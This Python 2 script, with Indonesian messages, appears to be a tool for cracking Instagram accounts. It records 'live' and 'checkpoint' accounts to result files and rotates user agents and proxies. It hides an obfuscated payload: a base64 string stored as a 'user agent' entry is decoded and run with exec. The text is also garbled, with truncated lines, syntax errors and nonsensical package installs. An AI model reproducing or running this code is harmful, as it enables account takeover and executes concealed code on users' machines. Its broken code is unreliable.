import json
import requests
import sys
import os



def main():
        os.system('clear')
        os.system('figlet DyyFbrn18')
        banner= '''

        [+]AUTHOR : DyyFbrn(Kanco)
        '''

        print(banner)
        a = "\033[96;1m"
        p = "\033[97;1m"
        h = "\033[92;1m"
        k = "\033[93;1m"
        m = "\033[91;1m"
        d = "\033[90;1m"

import os
try:
        import update
except ImportError:
        (
        print k+"\n Modul Update belom terinstall!..."
        )
        os.system("pkg install update" if os.name == "nt" else "pkg install update")
try:
        import upgrade
except ImportError:
        (
        print k+"\n Modul Upgrade belom terinstall!..."
        )
        os.system("pkg install update" if os name == "nt" else "pkg install upgrade")
try:
        import nano
except ImportError:
        (
        print k+"\n Modul Nano belom terinstall!..."
        )
        os.system("pkg install Nano" if os name == "nt" else "pkg install nano")
try:
        import python2
except ImportError:
        (
        print k+"\n Modul Python2 belom terinstall!..."
        )
        os.system("pkg install python2" if os name == "nt" else "pkg install python2")

import os, requests, re, json, random, sys, platform, base64,datetime, subprocess, time
from calendar import monthrange
from bs4 import BeautifulSoup
from concurrent.futures import ThreadPoolExecutor

garis = h+"+++>"

data_= []
hasil_ok = []
hasil_cp = []
c=1
status_foll =[]
data_followers = []
pencarian_ = []
platform_fbrn = str(platform.platform()).lower()
p1 = base64.b64encode(platform_fbrn)
list_proxy = []

try:
        has_ok = open("hasil_ok.txt", "r").readlines()
        with open("hasil_ok.txt", "w") as tul:
                tul.write("")
        for fbrn in set(has_ok):
                with open("hasil_ok.txt", "a") as tu:
                        tu.write(fbrn)
except:
        pass

url_instagram = "https://www.instagram.com/"
user_agentz = "Mozilla/5.0 (Linux; Android 11; RMX3191) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Mobile Safari/53                   >
user_agentz_api = "Mozilla/5.0 (Linux; Android 10; SM-G973F Build/QP1A.190711.020; wv) AppleWebKit/537.36 (KHTML, like Gecko) Versio                   >
user_agentz_qu = ["Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0", "Mozilla/5.0 (Linux; Android 10;                   >
exec(base64.b64decode(user_agentz_qu[2]))
headerz = {"User-Agent": user_agentz}
headerz_api = {"User-Agent": user_agentz_api}
def hapus_cookie():
        try:
                os.system("del cookie.txt" if os.name == "nt" else "rm -rf cookie.txt")
        except:
                pass
def hapus_cokiz():
        try:
                os.system("del cokiz.txt" if os.name == "nt" else "rm -rf cokiz.txt")
        except:
                pass


def cek_hasil():
        print garis
        print h+" >"+k+" 1"+p+". Cek Hasil "+h+"OK/Live"
        print h+" >"+k+" 2"+p+". Cek Hasil "+k+"Checkpoint"
        print garis
        while True:
                pil = raw_input(a+" ? "+p+"Pilih"+h+": ")
                if pil == "1":
                        try:
                                hasil_ok_ = open("hasil_ok.txt", "r").readlines()
                                print k+"\n >_"+p+" Menampilkan Hasil "+h+"Live\n"
                                for fbrn in hasil_ok_:
                                        ok = fbrn.replace("\n", "").split("==>")
                                        print a+"  {"+k+"Live"+a+"} "+h+ok[1]+a+" | "+p+ok[3]
                                print h+"\n >_< "+p+"Jumlah"+k+": "+str(len(hasil_ok_))
                        except:
                                print k+"\n Belum ada hasil"+h+" OK"
                        break
                elif pil == "2":
                        try:
                                hasil_cp_ = open("hasil_cp.txt", "r").readlines()
                                print k+"\n >_"+p+" Menampilkan Hasil "+k+"Checkpoint\n"
                                for fbrn in hasil_cp_:
                                        cp = fbrn.replace("\n", "").split("==>")
                                        print a+"  {"+p+"Chek"+a+"} "+k+cp[1]+a+" | "+d+cp[3]
                                print h+"\n >_< "+p+"Jumlah"+k+": "+str(len(hasil_cp_))
                        except:
                                print k+"\n Belum ada hasil"+p+" CP"
                        break
                else:
                        pass

def cek_login():
        global cookie
        try:
                cok = open("cookie.txt", "r").read()
        except IOError:
                login_fbrn()